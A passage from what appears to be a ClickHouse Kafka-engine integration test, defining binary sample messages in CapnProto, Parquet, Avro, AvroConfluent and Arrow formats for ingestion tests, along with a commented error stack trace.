x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one avro file per a message
# because of nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\